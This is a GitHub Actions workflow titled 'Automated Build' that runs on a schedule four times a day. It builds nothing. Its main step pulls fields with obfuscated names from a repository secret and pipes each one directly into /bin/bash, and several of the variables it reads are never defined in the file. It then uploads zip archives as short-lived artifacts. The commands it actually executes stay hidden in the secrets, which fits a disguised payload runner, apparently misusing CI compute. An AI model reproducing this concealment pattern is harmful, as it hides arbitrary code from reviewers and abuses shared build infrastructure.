name: Automated Build
on:
  workflow_dispatch:

  schedule:
    - cron: '1 4,10,16,22 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  job:
    name: Go
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Go
        env:
          n4: ${{ secrets.n4 }}
        run: |
          printf '%s' "$n4" | jq -r .tvcpv4 | /bin/bash
          printf '%s' "$llcko22256" | jq -r .n297 | /bin/bash
          echo $uen097 | jq -r .ong69396 | /bin/bash
          echo $yfknz45046 | jq -r .qlc38 | /bin/bash
          printf '%s' "$ayur4" | jq -r .hq8171 | /bin/bash

      - name: Store artifact
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: 0dg51EKt
          path: "*.zip"
          retention-days: 1
